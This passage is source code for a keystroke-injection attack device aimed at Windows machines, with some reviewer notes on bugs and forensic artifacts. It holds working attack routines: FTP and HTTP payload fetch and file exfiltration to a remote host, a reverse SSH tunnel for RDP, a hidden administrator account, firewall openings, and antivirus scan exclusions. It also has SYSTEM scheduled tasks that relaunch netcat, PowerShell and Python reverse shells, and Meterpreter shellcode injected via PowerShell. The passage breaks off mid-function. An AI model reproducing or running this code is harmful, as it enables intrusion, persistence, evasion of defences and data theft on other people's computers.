        flag.is_64bit = 1;   // if caps is on, then arch = 64-bit exists
    }
}

/** Checks for the presence of the task created by win_create____ScheduledTask()
    @param taskname  string handed to "schtasks /query | findstr" inside the script (win_create*ScheduledTask is not in this listing)
    NOTE(review): (1) script_name starts with a backslash while win_local_target_folder already ends with one, giving
    a doubled separator in every path; (2) the VBScript written here has an "End If" but no "If" clause and the
    findstr command string is never closed, so as written the script would not parse; (3) there is no return on
    the false path of a boolean function (undefined behaviour); (4) the inline comment mentions caps but the
    script uses lock_type. **/
boolean win_checkForTask(const char *taskname) {
    const char *script_name = "\\taskcheck.vbs";
    win_openCmd();   // open cmd.exe
    delay(300);
    Keyboard.print(F("echo function runCommand(command) : Dim objShell, objCmdExec : Set objShell = CreateObject(\"Wscript.Shell\") : set objCmdExec = objshell.exec(command): runCommand =objCmdExec.StdOut.ReadAll : end function : "));
    Keyboard.print(F("result = runCommand(\"cmd /c schtasks /query | findstr "));
    Keyboard.print(F(taskname));
    Keyboard.print(F("Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{"));
    Keyboard.print(F(lock_type));
    Keyboard.print(F("}\" : End If >"));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(300);
    Keyboard.print("cscript ");
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(500);
    Keyboard.println("exit");
    win_deleteFile(win_local_target_folder, script_name);
    if (checkResult()) {
        return true;   // if caps is on, then the task exists
    }
}

/** ============= File Transfer/Networking ============= **/

/** put file to remote server from victim machine via FTP
    @param filepath  full path of the file to upload (typed verbatim after "PUT ")
    Builds an ftp script line by line with @echo redirects, runs "ftp -s:", then deletes the script.
    NOTE(review): remote_user and remote_pass are written in clear text into ftpscript.txt on the host for the
    duration of the transfer, and the transfer itself is unencrypted FTP. script_name carries a leading backslash
    although win_local_target_folder already ends with one (doubled separator), whereas win_fetchFileFTP uses a
    relative name after cd. The file is not quoted, so paths with spaces break the PUT. **/
void win_putFileFTP(char *filepath) {
    const char *script_name = "\\ftpscript.txt";
    delay(200);
    win_openCmd();
    delay(200);
    Keyboard.print("@echo open ");
    delay(200);
    Keyboard.print(F(remote_ftp));   // ip of remote ftp server
    delay(200);
    Keyboard.print(F("> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(200);
    Keyboard.print(F("@echo "));
    delay(200);
    Keyboard.print(F(remote_user));   // ftp user
    delay(200);
    Keyboard.print(F(">> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(200);
    Keyboard.print(F("@echo "));
    delay(200);
    Keyboard.print(F(remote_pass));   // ftp pass
    delay(200);
    Keyboard.print(F(">> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(200);
    Keyboard.print(F("@echo bin >> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(200);
    Keyboard.print(F("@echo PUT "));
    delay(200);
    Keyboard.print(F(filepath));   // path and name of file to put
    delay(200);
    Keyboard.print(F(">> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(200);
    Keyboard.print(F("@echo quit>> "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(200);
    Keyboard.print("ftp -s:");
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(200);
    Keyboard.println("exit");
    delay(500);
    win_deleteFile(win_local_target_folder, script_name);   // cleanup script file
}

/** fetch file from remote server via FTP;
    takes one arg (filename); uses remote ftp IP defined in config section
    @param filename  name on the FTP server; saved under the same name in win_local_target_folder
    Same clear-text credential/script pattern as win_putFileFTP, but cd's into the drop folder first and uses a
    relative ftpscript.txt. Success is not checked here; callers use win_checkIfFile. **/
void win_fetchFileFTP(const char *filename) {
    delay(500);
    win_openCmd();
    delay(500);
    Keyboard.print(F("cd "));
    Keyboard.println(F(win_local_target_folder));   // move to target directory on victim machine
    Keyboard.print("@echo open ");
    Keyboard.print(F(remote_ftp));   // ip of remote ftp server
    Keyboard.println(F("> ftpscript.txt"));
    Keyboard.print(F("@echo "));
    Keyboard.print(F(remote_user));   // ftp user
    Keyboard.println(F(">> ftpscript.txt"));
    Keyboard.print(F("@echo "));
    Keyboard.print(F(remote_pass));   // ftp pass
    Keyboard.println(F(">> ftpscript.txt"));
    Keyboard.println(F("@echo bin >> ftpscript.txt"));
    Keyboard.print(F("@echo GET "));
    delay(200);
    Keyboard.print(F(filename));   // name of file to fetch from remote ftp server
    delay(200);
    Keyboard.print(F(" "));
    Keyboard.print(F(win_local_target_folder));
    delay(200);
    Keyboard.print(F(filename));
    delay(200);
    Keyboard.println(F(">> ftpscript.txt"));
    Keyboard.println(F("@echo quit>> ftpscript.txt"));
    Keyboard.println("ftp -s:ftpscript.txt");
    delay(500);
    Keyboard.println("cd \\ && exit");
    win_deleteFile(win_local_target_folder, "ftpscript.txt");   // cleanup script file
}

/** fetch file over HTTP via VBScript; takes one arg (filename); uses remote url defined in config section
    @param filename  appended to remote_url for the GET and to win_local_target_folder for the save path
    Downloads with MSXML2.XMLHTTP and writes the body through ADODB.Stream when the status is 200.
    NOTE(review): plain HTTP with no integrity check on the response; anything on the path can substitute the
    payload. The author's comment notes that an existing file at strHDLocation is not considered. **/
void win_fetchFileHTTP(const char *filename) {
    const char *script_name = "fetchhttp.vbs";
    delay(500);
    win_openCmd();   // open cmd.exe
    delay(1000);
    Keyboard.print(F("echo strFileURL = \""));
    Keyboard.print(F(remote_url));   // remote web server
    Keyboard.print(F(filename));   // name of file to fetch
    Keyboard.print(F("\" : strHDLocation = \""));
    Keyboard.print(F(win_local_target_folder));   // location to save file (set in config section)
    Keyboard.print(F(filename));   // name of file to fetch
    Keyboard.print(F("\" : Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") : "));
    Keyboard.print(F("objXMLHTTP.open \"GET\", strFileURL, false: objXMLHTTP.send() : If objXMLHTTP.Status = 200 Then 
:"));
    delay(500);
    Keyboard.print(F("Set objADOStream = CreateObject(\"ADODB.Stream\") : objADOStream.Open :"));
    Keyboard.print(F("objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 :"));
    delay(500);
    Keyboard.print(F("Set objFSO = Createobject(\"Scripting.FileSystemObject\") : "));   // doesn't take into account whether the file exists
    Keyboard.print(F("objADOStream.SaveToFile strHDLocation : objADOStream.Close : Set objADOStream = Nothing : End if : Set objXMLHTTP = Nothing > "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(1000);
    Keyboard.print(F("cscript "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(script_name);
    delay(2000);
    Keyboard.println("exit");
    delay(500);
    win_deleteFile(win_local_target_folder, script_name);   // cleanup script file
}

/** fetch a file, first attempting with HTTP, then with FTP
    uses win_fetchFileFTP and win_fetchFileHTTP
    @return true as soon as win_checkIfFile sees the file in win_local_target_folder after either attempt, else false. **/
boolean win_fetchFile(const char *filename) {
    win_fetchFileHTTP(filename);
    delay(2000);
    if (win_checkIfFile(win_local_target_folder, filename)){return true;}
    delay(2000);
    win_fetchFileFTP(filename);
    delay(2000);
    if (win_checkIfFile(win_local_target_folder, filename)){return true;}
    return false;
}

/** open reverse SSH RDP connection to remote machine
    use with win_getRDP() (not in this listing)
    Pre-seeds the PuTTY host-key cache in the user's registry with ssh_key so plink will not prompt, writes rdp.bat
    (plink with -R 3389:127.0.0.1:3389 and the password on the command line) and rdp.vbs (runs the batch file with
    a hidden window), launches the .vbs from the Run box and then deletes both files.
    NOTE(review): the HKCU\SOFTWARE\SimonTatham\PuTTY\SshHostKeys value persists after cleanup and remote_pass is
    written to disk and exposed in the plink process command line while the tunnel is up; both are host artifacts. **/
void win_plinkRDP(void) {
    win_openCmd();   // open cmd.exe
    delay(500);
    Keyboard.print(F("reg add \"HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\SshHostKeys\" /v rsa2@22:"));
    Keyboard.print(F(remote_ip));
    Keyboard.print(F(" /t REG_SZ /d "));
    Keyboard.print(F(ssh_key));
    Keyboard.println(F(" /f"));
    delay(500);

    // build the batch script
    const char *bat_script_name = "rdp.bat";
    Keyboard.print(F("echo @echo off > "));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.println(bat_script_name);
    Keyboard.print(F("echo start /b \""));
    Keyboard.print(F(win_local_target_folder));
    Keyboard.print(F("\" plink -l "));
    Keyboard.print(F(remote_user));
Keyboard.print(F(" -pw ")); Keyboard.print(F(remote_pass)); Keyboard.print(F(" -C -R 3389:127.0.0.1:3389 ")); Keyboard.print(F(remote_ip)); Keyboard.print(F(" >> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(bat_script_name); // create vbscript to run batch script without command window const char *vb_script_name = "rdp.vbs"; Keyboard.print(F("echo Set oShell = CreateObject (\"Wscript.Shell\") : Dim strArgs : strArgs = \"cmd /c ")); Keyboard.print(F(bat_script_name)); Keyboard.print(F("\" : oShell.Run strArgs, 0, false > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(vb_script_name); delay(500); Keyboard.println("exit"); // run vbscript to launch batch script delay(300); win_run(); delay(300); Keyboard.print(F(win_local_target_folder)); Keyboard.println(vb_script_name); // delete scripts delay(500); win_deleteFile(win_local_target_folder, bat_script_name); delay(500); win_deleteFile(win_local_target_folder, vb_script_name); } /** ============= Misc Admin Functions ============= **/ /** add admin user **/ void win_addUser(const char *username, const char *password) { win_openCmd(); delay(500); Keyboard.print(F("net user ")); Keyboard.print(username); Keyboard.print(F(" ")); Keyboard.print(password); Keyboard.println(F(" /add")); delay(500); Keyboard.print(F("net localgroup administrators ")); Keyboard.print(username); Keyboard.println(F(" /add")); delay(500); Keyboard.print(F("reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v ")); Keyboard.print(username); Keyboard.println(F(" /d 0 /t REG_DWORD /f")); delay(500); Keyboard.println("exit"); } /** open a program under within the current user's login session under the context of a different user (not currently used in this sketch) **/ void win_switchUserContext(const char *taskpath, const char *taskname) { win_openCmd(); delay(500); Keyboard.print(F("taskkill /F /IM ")); // kill explorer.exe Keyboard.println(taskname); 
delay(500); Keyboard.print(F("runas /user:")); Keyboard.print(F(local_user)); Keyboard.println(F(" ")); Keyboard.print(F(taskpath)); Keyboard.println(taskname); delay(500); Keyboard.println(local_pass); Keyboard.println("exit"); } /** make a port-based firewall exception rule **/ void win_firewallPortRule(char *port, char *rulename) { win_openCmd(); delay(1000); if (!flag.is_win7) { // winxp firewall rule Keyboard.print(F("netsh firewall add portopening all ")); Keyboard.print(F(port)); Keyboard.print(F(" ")); Keyboard.print(F(rulename)); Keyboard.println(F(" enable all")); } else { //win7 firewall rule Keyboard.print(F("netsh advfirewall firewall add rule name=")); Keyboard.print(F(rulename)); Keyboard.print(F(" dir=in action=allow protocol=TCP localport=")); Keyboard.println(F(port)); } Keyboard.println("exit"); } /** make an application-based firewall rule (such as ftp.exe) note: the program parameter must include the full path (i.e., c:\\windows\\system32\\ftp.exe) **/ void win_firewallProgramRule(char *program, char *rulename) { win_openCmd(); delay(1000); if (!flag.is_win7) { //win xp firewall rule Keyboard.print(F("netsh firewall add allowedprogram ")); Keyboard.print(F(program)); Keyboard.println(F(" enable")); } else { // win7 firewall rule Keyboard.print(F("netsh advfirewall firewall add rule name=")); Keyboard.print(F(rulename)); Keyboard.print(F(" dir=in action=allow program=\"")); Keyboard.println(F(program)); } Keyboard.println("exit"); } /** This function will disable an existing firewall rule given its name for example, Windows 7 has a "File Transfer Program" rule that would block ftp by default. 
    To disable it, use: win_firewallDisableRule("File Transfer Program")
    Currently only for Win 7: when flag.is_win7 is false nothing but "exit" is typed. Disabling a built-in
    block rule by name is a configuration change worth alerting on, like the add-rule functions above. **/
void win_firewallDisableRule(char *rulename) {
  win_openCmd();
  delay(1000);
  if (flag.is_win7) {
    Keyboard.print(F("netsh advfirewall firewall set rule name=\""));
    Keyboard.print(F(rulename));
    Keyboard.println(F("\" new enable=no"));
  }
  Keyboard.println("exit");
}

/** Enable RDP and open firewall
    Writes three HKLM values -- Terminal Server\AllowTSConnections = 1, Terminal Server\fDenyTSConnections = 0
    (the "allow remote connections" switch) and Services\TermService\Start = 2 (automatic start) -- starts the
    service with "sc start termservice", then adds an inbound allow rule for TCP 3389 named "rdp" via
    win_firewallPortRule. Requires admin privileges (HKLM writes, service control). Each of these registry
    writes and the TermService start are high-signal telemetry on hosts where RDP is not expected. **/
void win_enableRdp(void) {
  win_openCmd();
  delay(1000);
  Keyboard.println(F("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v AllowTSConnections /t REG_DWORD /d 1 /f"));
  Keyboard.println(F("reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"));
  Keyboard.println(F("reg add \"HKLM\\System\\CurrentControlSet\\Services\\TermService\" /v Start /t REG_DWORD /d 2 /f"));
  Keyboard.println(F("sc start termservice"));
  delay(1000);
  Keyboard.println("exit");
  delay(1000);
  win_firewallPortRule("3389", "rdp"); // open the RDP port inbound
}

/** The following functions create persistent, recurring tasks to get a reverse shell/RDP
    Command: schtasks /create
    Options Used:
      /TN [taskname]       -- uniquely name the task
      /RU [username]       -- account under which to run task
      /SC [interval]       -- task frequency type (MINUTE, HOUR, etc)
      /MO [interval value] -- task frequency value
      /TR [path/filename]  -- location of netcat on the victim machine (see config section)
    Every task in this group runs as SYSTEM every 5 minutes, so the task name (the win_*_task_name values in the
    config section), the task definition the Task Scheduler keeps on disk, and the task-creation audit event are
    the durable artifacts; the payload file itself lives in win_local_target_folder. **/

/** creates recurring task for vbscript shell
    Types "schtasks /create /TN <win_vbscript_task_name> /RU SYSTEM /SC MINUTE /MO 5 /TR "<folder><win_vbscript_file_name>"
    and immediately triggers it with "schtasks /run". Nothing in this function creates the .vbs file itself. **/
void win_createVBShellScheduledTask(void) {
  win_openCmd(); // open cmd.exe
  delay(300);
  Keyboard.print(F("schtasks /create /TN "));
  delay(300);
  Keyboard.print(win_vbscript_task_name);
  delay(300);
  Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \""));
  delay(300);
  Keyboard.print(F(win_local_target_folder));
  delay(300);
  Keyboard.println(F(win_vbscript_file_name));
  delay(300);
  Keyboard.print(F("schtasks /run /TN ")); // first run right away rather than waiting for the schedule
  delay(300);
  Keyboard.println(win_vbscript_task_name);
  delay(300);
  Keyboard.println("exit");
}

/** creates recurring task for netcat
shell **/ void win_createNetcatScheduledTask(void) { win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("schtasks /create /TN ")); delay(300); Keyboard.print(win_netcat_task_name); delay(300); Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \" ")); delay(300); Keyboard.print(F(win_local_target_folder)); delay(300); Keyboard.print(F(netcat_remote_file)); delay(300); Keyboard.print(F(" ")); delay(300); Keyboard.print(F(remote_ip)); delay(300); Keyboard.print(F(" ")); delay(300); Keyboard.print(F(remote_nc_port)); delay(300); Keyboard.println(" -e cmd.exe\"");; delay(300); Keyboard.print(F("schtasks /run /TN ")); Keyboard.println(win_netcat_task_name); delay(300); Keyboard.println("exit"); } /** creates recurring task for python shell; takes path to python.exe as arg **/ void win_createPythonScheduledTask(const char *path) { win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("schtasks /create /TN ")); delay(300); Keyboard.print(win_python_task_name); delay(300); Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \"")); delay(300); Keyboard.print(F(path)); delay(300); Keyboard.print(F(" ")); delay(300); Keyboard.print(F(win_local_target_folder)); delay(300); Keyboard.println(F(win_python_file_name)); delay(300); Keyboard.print(F("schtasks /run /TN ")); Keyboard.println(win_python_task_name); delay(300); Keyboard.println("exit"); } /** creates recurring task for powershell shell **/ void win_createPowerShellScheduledTask(void) { win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("schtasks /create /TN ")); delay(300); Keyboard.print(win_powershell_task_name); delay(300); Keyboard.print(F(" /RU SYSTEM /SC MINUTE /MO 5 /TR \"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File ")); delay(300); Keyboard.print(F(win_local_target_folder)); delay(300); Keyboard.println(F(win_psscript_file_name)); delay(300); Keyboard.print(F("schtasks /run /TN ")); Keyboard.println(win_powershell_task_name); 
delay(300); Keyboard.println("exit"); } /** In many cases, even local Admins are prevented from disabling AV due to GPOs, however they may not be restricted from adding file/folder scanning exceptions This function will add a folder exception for storing executables, backdoors, etc Attempts to perform this function reliably via registry changes were not successful, even under admin accounts so this GUI method was chosen This still requires an account with Admin privs to execute! **/ void win_securityEssentialsGUIException(void) { win_openCmd(); delay(300); Keyboard.println("taskkill /F /IM msseces.exe"); // necessary if it is already running to reset the GUI focus // so we always start from the same place delay(300); Keyboard.println("exit"); delay(500); if (!flag.is_win7) { // if Win XP, open from cmd using default path (not ideal) win_openCmd(); delay(500); Keyboard.println("\"C:\\Program Files\\Microsoft Security Client\\msseces.exe\""); } else { // otherwise, use search function to open it, regardless of install function //open search Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); clearKeys(); delay(500); // open Security Essentials GUI Keyboard.println("Security Essentials"); } //keystrokes to enter folder exception to real-time protection delay(2500); sendKey(KEY_TAB); sendKey(KEY_ENTER); // Select "Change my Scan Schedule" to go to "Settings" tab delay(500); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); // arrow down to "Excluded Files and Locations" sendKey(KEY_TAB); Keyboard.print(win_local_target_folder); // enter folder path delay(500); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_ENTER); // "Add" delay(500); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_ENTER); // "Save Changes" delay(500); sendKey(KEY_LEFT); sendKey(KEY_ENTER); // confirm security prompt delay(500); win_closeWindow(); // close Security Essentials window if (!flag.is_win7) { // exit command prompt 
Keyboard.println("exit"); } } /** In many cases, even local Admins are prevented from disabling AV due to GPOs, however they may not be restricted from adding file/folder scanning exceptions This function will add a folder exception for storing executables, backdoors, etc via registry update **/ void win_sepRegException(void) { char *regkey = NULL; if (!flag.is_win7) { regkey = "\"HKLM\\SOFTWARE\\Symantec\\Symantec Endpoint Protection\\AV\\Exclusions\\ScanningEngines\\Directory\\Client\\1234567890\""; } else { regkey = "\"HKLM\\SOFTWARE\\Wow6432Node\\Symantec\\Symantec Endpoint Protection\\AV\\Exclusions\\ScanningEngines\\Directory\\Client\\1234567890\""; } win_openCmd(); // open cmd.exe delay(1000); Keyboard.print(F("reg add ")); Keyboard.println(F(regkey)); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.print(F(" /v DirectoryName /t REG_SZ /d ")); Keyboard.print(win_local_target_folder); Keyboard.println(F(" /f")); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ExcludeSubDirs /t REG_DWORD /d 1 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ExtensionList /t REG_SZ /d \"\" /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v FirstAction /t REG_DWORD /d 17 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v Owner /t REG_DWORD /d 4 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ProtectionTechnology /t REG_DWORD /d 1 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ScanCategories /t REG_DWORD /d 4294967295 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v SecondAction /t REG_DWORD /d 17 /f"); Keyboard.print(F("reg add ")); Keyboard.print(F(regkey)); Keyboard.println(" /v ThreatName /t REG_SZ /d \"Default Symantec Setting (Don't Delete)\" /f"); delay(300); Keyboard.println("n"); // just in case the 
rules already exist, this will quiet the prompt Keyboard.println("exit"); } /** This function attempts to locate installed AV and create a folder-based scan exception It currently only looks for Symantec SEP and Windows Security Essentials If an exception is successful or if no AV is found, it sets flag.persist to true so that persistent shells can be tried first **/ void win_avException(void) { if (win_checkIfInstalled("Symantec")) { // exception for Symantec SEP win_sepRegException(); flag.persist = 1; //assume AV exception, try persistent shell delay(300); } else if (win_checkIfInstalled("Security Essentials")) { // exception for Windows Security Essentials win_securityEssentialsGUIException(); flag.persist = 1; // assume AV exception, try persistent shell delay(300); } else { flag.persist = 1; // default to no AV found, try a peristent shell first } } /** ============= Reverse Shells ============= **/ /** The following functions execute reverse shells using various tools (python, vbscript, powershell **/ /** manually open netcat reverse shell to attacker ip/port may require download of netcat via fetch file function for persistent connection use win_createNetcatScheduledTask() instead **/ void win_manualNetcatLaunch(void) { win_openCmd(); delay(300); Keyboard.print(F("start /B ")); Keyboard.print(F(win_local_target_folder)); Keyboard.print(F(netcat_remote_file)); Keyboard.print(F(" ")); Keyboard.print(F(remote_ip)); Keyboard.print(F(" ")); Keyboard.print(F(remote_nc_port)); Keyboard.println(F(" -e cmd.exe")); delay(300); Keyboard.println("exit"); } /** use powershell to execute meterpreter shell from command line Full credit to Offsec crew: this is just a slighlty modified version of the original function function from Github peensy code **/ void win_powershellRevMeterpreter(void) { delay(1000); char *iphex = makeIPHex("powershell"); // converts ip address into hex, returns desired python format win_checkArch(); delay(500); Keyboard.print(F("$code = '")); 
Keyboard.print(F("[DllImport(\"kernel32.dll\")]")); Keyboard.print(F("public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);")); Keyboard.print(F("[DllImport(\"kernel32.dll\")]")); Keyboard.print(F("public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);")); Keyboard.print(F("[DllImport(\"msvcrt.dll\")]")); Keyboard.print(F("public static extern IntPtr memset(IntPtr dest, uint src, uint count);';")); Keyboard.print(F("$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru;")); if (flag.is_64bit) { // arch = 64 bit meterpreter char *porthex = makePortHex("powershell", "met64"); // converts port into hex; returns desired python format Keyboard.print(F("$p00=0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52;")); Keyboard.print(F("$p01=0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48;")); Keyboard.print(F("$p02=0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9;")); Keyboard.print(F("$p03=0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41;")); Keyboard.print(F("$p04=0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48;")); Keyboard.print(F("$p05=0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01;")); Keyboard.print(F("$p06=0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48;")); Keyboard.print(F("$p07=0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0;")); Keyboard.print(F("$p08=0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c;")); Keyboard.print(F("$p09=0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0;")); Keyboard.print(F("$p10=0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04;")); 
Keyboard.print(F("$p11=0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59;")); Keyboard.print(F("$p12=0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48;")); Keyboard.print(F("$p13=0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33;")); Keyboard.print(F("$p14=0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00;")); Keyboard.print(F("$p15=0x49,0x89,0xe5,0x49,0xbc,0x02,0x00;")); Keyboard.print(iphex); Keyboard.print(porthex); Keyboard.print(F("$p16=0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c;")); Keyboard.print(F("$p17=0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff;")); Keyboard.print(F("$p18=0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2;")); Keyboard.print(F("$p19=0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48;")); Keyboard.print(F("$p20=0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99;")); Keyboard.print(F("$p21=0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec;")); Keyboard.print(F("$p22=0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41;")); Keyboard.print(F("$p23=0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41;")); Keyboard.print(F("$p24=0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41;")); Keyboard.print(F("$p25=0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31;")); Keyboard.print(F("$p26=0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8;")); Keyboard.print(F("$p27=0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7;")); Keyboard.print(F("[Byte[]];")); Keyboard.print(F("[Byte[]]$sc64 = 
$p00+$p01+$p02+$p03+$p04+$p05+$p06+$p07+$p08+$p09+$p10+$p11+$p12+$p13+$p14+$p15+$rport+$rhost+$p16+$p17+$p18+$p19+$p20+$p21+$p22+$p23+$p24+$p25+$p26+$p27;")); } else {// arch = 32 bit meterpreter char *porthex = makePortHex("powershell", "met32"); // converts port into hex; returns desired python format Keyboard.print(F("$p01=0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b;")); Keyboard.print(F("$p02=0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0;")); Keyboard.print(F("$p03=0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57;")); Keyboard.print(F("$p04=0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01;")); Keyboard.print(F("$p05=0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b;")); Keyboard.print(F("$p06=0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4;")); Keyboard.print(F("$p07=0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b;")); Keyboard.print(F("$p08=0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24;")); Keyboard.print(F("$p09=0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d;")); Keyboard.print(F("$p10=0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07;")); Keyboard.print(F("$p11=0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00;")); Keyboard.print(F("$p12=0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff;")); Keyboard.print(F("$p13=0xd5,0x97,0x6a,0x05,0x68;")); Keyboard.print(F("$p14=0x68,0x02,0x00;")); Keyboard.print(iphex); Keyboard.print(porthex); 